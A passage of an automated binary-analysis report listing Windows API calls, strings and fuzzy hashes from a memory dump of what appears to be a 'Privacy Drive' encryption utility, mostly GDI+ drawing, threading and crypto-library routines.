                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B27
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B50
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B62
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$HEIGHT$SETTINGS$WIDTH
                                • API String ID: 904232820-2107324581
                                • Opcode ID: 2a7a4683f37bf8fb05f1c399d6050ef2a62edfb5a27c99c38a995285cc8654e9
                                • Instruction ID: 1a1b8663d487c9b13af43dc03755f6a51117a3199646d30a022d9ead9a936584
                                • Opcode Fuzzy Hash: 2a7a4683f37bf8fb05f1c399d6050ef2a62edfb5a27c99c38a995285cc8654e9
                                • Instruction Fuzzy Hash: 1F21A130384705ABDA50EB769C96FA2ABE4BB54706F00442FBA49D72D1EEE4F904C724
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000000,7563D392), ref: 004331E9
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipSetSmoothingMode.GDIPLUS(?,00000002,?,0000000E,00000014,000000FF,?,00000041,00000017,?,00000064,?,FF414141), ref: 0043329C
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 004332B3
                                • GdipSetSmoothingMode.GDIPLUS(?,00000003,?,00000000,0000009B,?,?,FF414141), ref: 004333D3
                                • GdipDrawImage.GDIPLUS(?,00000000,?,?,?,?,?,FF800000,&1C), ref: 0043344C
                                • GdipDrawImage.GDIPLUS(?,00000000,?,?,?,?,?,?,?,FF800000,&1C), ref: 00433495
                                • GdipDeleteStringFormat.GDIPLUS(?,?,?,?,?,?,?,?,FF800000,&1C), ref: 004334AC
                                Strings
                                Similarity
                                • API ID: Gdip$CreateDeleteDrawFormatString$FillImageModeRectangleSmoothing$AlignBrushDashPen1SolidStyle
                                • String ID: &1C
                                • API String ID: 1440256547-3926521048
                                • Opcode ID: 047926612a78ebb6fd7e44dd68211650be52230eac5ff03b792717a8f63b8e49
                                • Instruction ID: 74fa3053ec13297bfe3fdf984fd85f900a1049ffd97a30dd2928f0e2f41cc866
                                • Opcode Fuzzy Hash: 047926612a78ebb6fd7e44dd68211650be52230eac5ff03b792717a8f63b8e49
                                • Instruction Fuzzy Hash: 5FA16C75600609EFDB15CF64CC85FAABBB9EF48315F00821EF9269B290DB74AA04DF54
                                APIs
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,00000038,0056C344,00000005), ref: 004AE35D
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,0054A318,0056C344,00000005), ref: 004AE3B0
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,0054A318,0056C344,00000005), ref: 004AE456
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer,?,0056C344,00000005), ref: 004AE4E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !@$/select,"%s"$Explorer$OPEN
                                • API String ID: 587946157-2739410801
                                • Opcode ID: 6452da547931195d0c5c5ff6063dd79861fa737d04357eac0afe383d768fdde5
                                • Instruction ID: 2826955243ba4db129723b3504ea30e3d4886e60a98cb06a18c389304b2707ee
                                • Opcode Fuzzy Hash: 6452da547931195d0c5c5ff6063dd79861fa737d04357eac0afe383d768fdde5
                                • Instruction Fuzzy Hash: D1910171A00204DFDF10DF99D949B9EBBB4BF25318F20066EE825A72D0E3746908CBA5
                                APIs
                                • Sleep.KERNEL32(00000032,00000000,?,7563D392,00000000,00000000), ref: 004A6518
                                • CreateThread.KERNEL32(00000000,00000000,004A5ED0,?,00000000,00000000), ref: 004A6548
                                • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 004A6564
                                • PeekMessageW.USER32(00000002,00000000,00000000,00000000,00000002), ref: 004A6579
                                • EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6597
                                  • Part of subcall function 004A75F0: EnterCriticalSection.KERNEL32(005BE2CC,?,?,?,?,?,?,00000000,00000000), ref: 004A766C
                                • LeaveCriticalSection.KERNEL32(?,?), ref: 004A6655
                                • SetLastError.KERNEL32(00000000), ref: 004A666F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CriticalSection$Enter$CreateErrorLastLeaveMessageObjectPeekSingleSleepThreadWait
                                • String ID: !@
                                • API String ID: 956063979-1028639617
                                • Opcode ID: 1c892b0a494d95129ab7aebc55ad6221570328481583d5927a730cb2bd0ac8f8
                                • Instruction ID: aebf58b705ae175c566f4567bfb3b99d4fa2f247bee2bd3eaeb78ed60df37bdb
                                • Opcode Fuzzy Hash: 1c892b0a494d95129ab7aebc55ad6221570328481583d5927a730cb2bd0ac8f8
                                • Instruction Fuzzy Hash: 68718A74E00208DFDB10DFA8D985B9EBBB5FF19704F19812AE505EB390D774AA04CB95
                                APIs
                                • GetDC.USER32(00000000), ref: 0042A45C
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042A47A
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0042A4A7
                                • GdipMeasureString.GDIPLUS(00000000,Test,000000FF,?,?,00000000,?,00000000,00000000), ref: 0042A4FE
                                • ReleaseDC.USER32(00000000,00000000), ref: 0042A522
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 0042A531
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0042A540
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID: Test
                                • API String ID: 2860005999-2018365746
                                • Opcode ID: 1170c894e4341502edd069b38d8921440693ac9ea861cefa6b29807d3eafabad
                                • Instruction ID: b8c2d48d77c7336f129466dd9d56dc9088578dba89927b40d2fcb0531f9cf7ca
                                • Opcode Fuzzy Hash: 1170c894e4341502edd069b38d8921440693ac9ea861cefa6b29807d3eafabad
                                • Instruction Fuzzy Hash: 1A315C716083409FD310CF68DC44B1BFBE8FB99765F100A1EF994E22A0E7B5D9488B56
                                APIs
                                • GdipCreateRegion.GDIPLUS(?), ref: 004CEBF3
                                • GdipGetClip.GDIPLUS(?,?), ref: 004CEC1A
                                • GdipSetClipRectI.GDIPLUS(?,?,?,?,?,00000000), ref: 004CEC7B
                                • GdipTranslateWorldTransform.GDIPLUS(?,?,?,?,?,?,?,?,?,?,00000000,0054C878,000000FF,?,004CE251,?), ref: 004CECB0
                                • GdipTranslateWorldTransform.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C878,000000FF), ref: 004CED04
                                • GdipSetClipRegion.GDIPLUS(?,00000000,00000000), ref: 004CED8C
                                • GdipGraphicsClear.GDIPLUS(?,00000000), ref: 004CEDB3
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004CEDEC
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004CEE2C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$ClipRegion$TransformTranslateWorld$ClearCreateDeleteDrawGraphicsImageRect
                                • String ID:
                                • API String ID: 1997033163-0
                                • Opcode ID: a5fe25b07bf309373de5cb3ed6c0f2f5c49db52dd81819346cf14c7d097b02ea
                                • Instruction ID: 3b760042a636472ae5f59660e2c08b4a3577a1f097ca54f87d86c09295d0c42f
                                • Opcode Fuzzy Hash: a5fe25b07bf309373de5cb3ed6c0f2f5c49db52dd81819346cf14c7d097b02ea
                                • Instruction Fuzzy Hash: 0D815675600702AFD754DF25C884BAAFBE9FF49740F04462EE956A72A0EB30F854CB91
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipGetImageHeight.GDIPLUS(?,7563D392,00000000,00000000,?,?,FFE7F1FA,?,00000000,?,00000000,00000000,?,?), ref: 0041E85B
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041E8A4
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E8C2
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041E8DA
                                • GdipCreatePen1.GDIPLUS(50000000,?,00000000,FF323232), ref: 0041E9A8
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF323232), ref: 0041E9BD
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041EA11
                                • GdipDeletePen.GDIPLUS(?), ref: 0041EA27
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF323232,?,00000046,?,?,?,?,FF007ACC), ref: 0041EA39
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$CreateDelete$DrawFormatRectangleString$DashFillImagePen1Style$BrushHeightSolidTrimming
                                • String ID:
                                • API String ID: 2933048271-0
                                • Opcode ID: 77cd7bd38adf20e8aa9f8d371aa45941266994db49abaef2069ec16743e11f5e
                                • Instruction ID: c8dc82a152294b9af04c729f5b6bf6fe31f2a742b568a157ee1cffdbb42a40b4
                                • Opcode Fuzzy Hash: 77cd7bd38adf20e8aa9f8d371aa45941266994db49abaef2069ec16743e11f5e
                                • Instruction Fuzzy Hash: 52817EB0204706AFD714CF25CC45F5ABBE4FF98714F104A1DF996972A0E730A948CB56
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipGetImageHeight.GDIPLUS(?,?,00000000,00000000,?,?,FFC6E0F1,?,00000000,?,00000000,00000000), ref: 0041EAEA
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041EB2F
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041EB4D
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041EB65
                                • GdipCreatePen1.GDIPLUS(50000000,?,00000000,FF323232), ref: 0041EC37
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF323232), ref: 0041EC4C
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041ECA0
                                • GdipDeletePen.GDIPLUS(?), ref: 0041ECB6
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF323232,?,00000046,?,?,?,?,FF2B5D8E), ref: 0041ECC8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$CreateDelete$DrawFormatRectangleString$DashFillImagePen1Style$BrushHeightSolidTrimming
                                • String ID:
                                • API String ID: 2933048271-0
                                • Opcode ID: 8678ed94756cb3ca496aa687fe91f3abea0a992045d671d493c6aec0f3073713
                                • Instruction ID: e2856614cb35424f23431b49b84df5e0b065689b9bdae76c9928934769a9038d
                                • Opcode Fuzzy Hash: 8678ed94756cb3ca496aa687fe91f3abea0a992045d671d493c6aec0f3073713
                                • Instruction Fuzzy Hash: 78715A70208706AFD715CF25CC85B6BBBE8FF88714F10461DF99A97290E734A848DB66
                                APIs
                                  • Part of subcall function 004C1DB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?), ref: 004C1E7F
                                • EnterCriticalSection.KERNEL32(005BDCCC,ENGLISH,00000007,English.xml,0000000B,Languages\,0000000A,005BDD4C,00000000,000000FF,005BDD7C,7563D392), ref: 0041F3CE
                                • LeaveCriticalSection.KERNEL32(005BDCCC,?,?), ref: 0041F3FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: CriticalSection$ByteCharEnterLeaveMultiWide
                                • String ID: ENGLISH$English.xml$FileName$General\Language$Languages\$PZ$Value
                                • API String ID: 3162664464-823105448
                                • Opcode ID: d58b0a562f7a3f3d16fdd488f3c115c605477fc0a20af14e63d6845a59a3c83f
                                • Instruction ID: 1d496fb5c4783d14e9ad2d6040b123dae3e84bc46c03fc0296c52f160277644a
                                • Opcode Fuzzy Hash: d58b0a562f7a3f3d16fdd488f3c115c605477fc0a20af14e63d6845a59a3c83f
                                • Instruction Fuzzy Hash: CF613770D00248DEEB10DFE4C859BDEBBB4BF14718F100529E415BB291D7B96A49CBA5
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041E5B4
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 0041E5FB
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E619
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041E631
                                • GdipCreatePen1.GDIPLUS(FF505050,?,00000000,FF464646), ref: 0041E6FF
                                • GdipSetPenDashStyle.GDIPLUS(?,00000002,?,00000000,FF464646), ref: 0041E714
                                • GdipDrawRectangle.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,0053C460,000000FF), ref: 0041E768
                                • GdipDeletePen.GDIPLUS(?), ref: 0041E77E
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000046,?,?,?,?,FF464646,?,00000046,?,?,?,?,FF007ACC), ref: 0041E790
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$FormatString$CreateDeleteDrawImage$DashHeightPen1RectangleStyleTrimming
                                • String ID:
                                • API String ID: 2679673769-0
                                • Opcode ID: f30b74f11c38feade10581bd63fe94443a1d1bed803c3e578bc0585de21dd0e0
                                • Instruction ID: a784becf70f3238f7b51dac09e708a2ae01ae68730202bd750031b43e5c3722b
                                • Opcode Fuzzy Hash: f30b74f11c38feade10581bd63fe94443a1d1bed803c3e578bc0585de21dd0e0
                                • Instruction Fuzzy Hash: B4617B71208702EFDB11CF25CC44B5ABBE4FF99714F004A2DF99A932A0E774A848DB56
                                APIs
                                • GetDC.USER32(00000000), ref: 0041B57C
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041B598
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041B5E5
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000005), ref: 0041B5F7
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 0041B63D
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0041B664
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041B696
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0041B6A3
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 0041B6B3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsHintImageMeasureReleaseRenderingTextWidth
                                • String ID:
                                • API String ID: 4226289993-0
                                • Opcode ID: 25904d8595792bb77d6cf88693a8d6d9b459301a488abf0d0783ee1b5fb626c4
                                • Instruction ID: a70a1824d574f4a95f4a6aff59bd4f0141cdcc5c27e7c1e21561ca3b9456bd18
                                • Instruction Fuzzy Hash: C7516B71A00209DFDB01CF98D998BEEBBF4FB49711F10426AE805E72A0E7716904DFA0
                                APIs
                                • GetDC.USER32(00000000), ref: 00467A76
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 00467A94
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00467AE9
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 00467AFB
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000002), ref: 00467B10
                                • GdipMeasureString.GDIPLUS(00000000,00000000,000000FF,00000000,?,00000000,?,?,?), ref: 00467B52
                                • ReleaseDC.USER32(00000000,00000000), ref: 00467B64
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00467BAF
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 00467BBE
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintMeasureReleaseRenderingTextTrimming
                                • String ID:
                                • API String ID: 153191451-0
                                • Opcode ID: d07fed15a014139f23464f3431247c6c7a17ed6c8e922e04b791546cd2e353f8
                                • Instruction ID: 9bdd4b58217074fa9055cd543657364a1f13981c0e7dc88f0ebbfea74f2aa07f
                                • Instruction Fuzzy Hash: C0416A711183449FD301CF25CC98B2BBBF4FF9A759F000A1DF895962A0E7B5A848CB52
                                APIs
                                • GetDC.USER32(00000000), ref: 0041A7BA
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041A7D6
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041A820
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 0041A830
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 0041A843
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 0041A87D
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041A88E
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0041A8AC
                                • GdipDeleteGraphics.GDIPLUS(00000000), ref: 0041A8BA
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintMeasureReleaseRenderingTextTrimming
                                • String ID:
                                • API String ID: 153191451-0
                                • Opcode ID: 5844a7fc248f398f4e4756010655fb98f439cc8e48f55539702864a97a99885b
                                • Instruction ID: 41d104d89a2a550782616ac7e2857eb16365c0e93b9f0b62b7e1e99a0633de65
                                • Instruction Fuzzy Hash: 93413C72A00308EFEB01CFA5DC58BEEBBB8FB59711F10421AE911B7290EB755944DB64
                                APIs
                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0043195D
                                • CreateThread.KERNEL32(00000000,00000000,Function_00031890,00000000,00000000,00000000), ref: 00431980
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00431999
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004319A9
                                • PostThreadMessageW.USER32(?,00000466,00000000,00000000), ref: 004319D7
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004319E1
                                • PostMessageA.USER32(00000000), ref: 004319FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00431A07
                                • CloseHandle.KERNEL32(?), ref: 00431A0D
                                Similarity
                                • API ID: ObjectSingleWait$CreateMessagePostThread$CloseEventHandle
                                • String ID:
                                • API String ID: 439857621-0
                                • Opcode ID: b7d0fa7f5be62e31129a1dc0d245f2a881528ce9d1fd1e3e293f5516e472c95f
                                • Instruction ID: f64bf624381ee92e46cb07f6cf6e2c58ad401747612f4ba90984a1bfad036376
                                • Instruction Fuzzy Hash: 9921C875640304BBEB209FA4CC05FAB77B4FF05721F104625F665A62E0CBB56904DB54
                                APIs
                                • MessageBoxW.USER32(00000000,Failed to initialize Hash algorithms library!,Error,00000000), ref: 0042BE91
                                Similarity
                                • API ID: Message
                                • String ID: !@$%02X$Error$Failed to initialize Hash algorithms library!$[ %u ] $sha512
                                • API String ID: 2030045667-1952778553
                                • Opcode ID: 28e414ebb50535f0594b185df9f13bd8f991b6176998a28923e9ed53f8c4f2da
                                • Instruction ID: 091f596372a404d4d97e4d58a6476940ffa6c945c863458762611e3b93a7fdf8
                                • Instruction Fuzzy Hash: 51B1ACB02183809EE320DF64D885B9BBBE4BF85708F404E2DF5D9962C1D7B99508CB97
                                APIs
                                • _malloc.LIBCMT ref: 0051B360
                                  • Part of subcall function 0052CF10: _fprintf.LIBCMT ref: 0052CF2A
                                  • Part of subcall function 0052CF10: _raise.LIBCMT ref: 0052CF31
                                • _free.LIBCMT ref: 0051B41F
                                Similarity
                                • API ID: _fprintf_free_malloc_raise
                                • String ID: G_C$dp != NULL$key != NULL$ltc_mp.name != NULL$src\pk\ecc\ecc_make_key.c
                                • API String ID: 2491835905-2432424472
                                • Opcode ID: 87869aad49a5f9db2c27e47bcdc1459b3fbfd7df1fa63d6b1aaae5b8d47e28a6
                                • Instruction ID: c6510904cd206698877bf0f0a93d39303303e949e9abeec41f0cd632c6b8c825
                                • Instruction Fuzzy Hash: 5071CF3694021AAFEB219F50DC46FDEBBA5BF18314F040551FD14672A2E372AEA49BC1
                                APIs
                                • _memmove.LIBCMT ref: 004120F9
                                • _memmove.LIBCMT ref: 0041212E
                                • _memmove.LIBCMT ref: 00412165
                                • _memmove.LIBCMT ref: 00412186
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004121C0
                                Similarity
                                • API ID: _memmove$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                • String ID: &nJ$deque<T> too long
                                • API String ID: 279611364-2875715942
                                • Opcode ID: cd0a0a4a5e4168138cc841e3c8e4ce04ef86546b5a37f16f0dca6030d7293155
                                • Instruction ID: de54a4e7107b52c4245634e6d1b8647f75ed2680f490c29328737f0c368ae0c6
                                • Instruction Fuzzy Hash: 9C41C371A00115ABDB10CF68CD85BAEB77ABF84300F18866AD904E7395D7B5EE15CAE0
                                APIs
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,?,?,00000000,00000000), ref: 004EE89E
                                • GdipCreateRegion.GDIPLUS(00000000), ref: 004EE928
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,?), ref: 004EE98E
                                • GdipGetRegionBounds.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 004EE9DD
                                • GdipSetStringFormatMeasurableCharacterRanges.GDIPLUS(?,00000001,00000000), ref: 004EEA0F
                                • GdipGetRegionBounds.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 004EEA5E
                                • GdipDeleteRegion.GDIPLUS(00000000), ref: 004EED5D
                                Similarity
                                • API ID: Gdip$Region$String$BoundsCharacterFormatMeasurableRanges$CreateDeleteMeasure
                                • String ID:
                                • API String ID: 3891382466-0
                                • Opcode ID: 56e295ed0bbe2b8691e23db203ca975ee50b6a87b482520bf5b09f2392fedcf6
                                • Instruction ID: 6960a11009b4bb04875be0ce1331bb0f19d576027dd699c8ba19fe3ebc183744
                                • Instruction Fuzzy Hash: 9BF16C71904749DFD311CF33C844BA7BBE0AFAA305F148B1EF89AA62A0D735A444DB55
                                Similarity
                                • API ID: DrivesExecuteLogicalShell_memset
                                • String ID: :\$<$HZ$open
                                • API String ID: 1014424214-864357636
                                • Opcode ID: 9d7b293134f83c8291e39a68c6c5a54b25b585f60e8525cb2d7d4d8adc90c3d8
                                • Instruction ID: eab8e807e8c0203b723bbe86bd1204b7ca5e47fc920744965472b0e7266096ad
                                • Instruction Fuzzy Hash: 444159B5D002589FDB30DF58D448B9EBBF4BB04324F08847AE855A7790C778AC49CB44
                                APIs
                                • OpenFileMappingW.KERNEL32(00000004,00000000,7563D392), ref: 0042C5CB
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0042C5E0
                                  • Part of subcall function 004210A0: EnterCriticalSection.KERNEL32(005AE198,7563D392,?,00000000,?,?,?,00000000,0053B418,000000FF,?,0042C5F1,00000000), ref: 004210E4
                                  • Part of subcall function 004210A0: LeaveCriticalSection.KERNEL32(005AE198,0042C5F1), ref: 0042113C
                                • PostMessageW.USER32(00000111,000004DC,00000000,00000000), ref: 0042C603
                                • CloseHandle.KERNEL32(00000000), ref: 0042C60A
                                Similarity
                                • API ID: CriticalFileSection$CloseEnterHandleLeaveMappingMessageOpenPostView
                                • String ID: !@$%s_Shared_%u$_Privacy Drive
                                • API String ID: 1433164727-916476676
                                • Opcode ID: 0879a008ea770c22e855ba54283b49706a216e68642c972544032f1920504811
                                • Instruction ID: 0679cf7c776a440fcfb53d7d19e9896e3e829f526dbe958e15f183deb233a8a0
                                • Instruction Fuzzy Hash: 7D315C71E01309AFEB10DFA4DD5ABAEBBB4FB09714F104119E611B72D0D7B46A04CBA9
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 00444B86
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00444BA4
                                • GdipCreateSolidFill.GDIPLUS(FF282828,?), ref: 00444BE5
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000005), ref: 00444C06
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,0056E884,?,?,FF414141,?,?,?,?,?,FF414141), ref: 00444CCA
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141), ref: 00444DF3
                                  • Part of subcall function 004CC050: GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                • GdipDeleteBrush.GDIPLUS(00000000,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141,?), ref: 00444F18
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000064,?,FF414141,?,00000000,?,?,00000050,?,FF414141,?), ref: 00444F2A
                                Similarity
                                • API ID: Gdip$String$Format$CreateDraw$AlignDeleteFillSolid$BrushImageTrimming
                                • String ID:
                                • API String ID: 1816208350-0
                                • Opcode ID: 8bb4c5b415326a8f66e3ff32312c09ccceafd258d4a0ca0d14d25e5d9f3b20ce
                                • Instruction ID: 618bb39d0e569f55146f4b341f5b4325fd5543f0e65debef94d08a7a2b146bf4
                                • Instruction Fuzzy Hash: 47D13374204702EFD705CF28C888F5ABBE5FB89709F004A59F5499B2A0D730E958CFA6
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D4440
                                • TranslateMessage.USER32(?), ref: 004D4460
                                • DispatchMessageW.USER32(?), ref: 004D446A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004D4487
                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,0048713B,00000000), ref: 004D448F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: Message$Peek$DispatchSleepTranslate
                                • String ID: ;qH$p
                                • API String ID: 1762048999-473232785
                                APIs
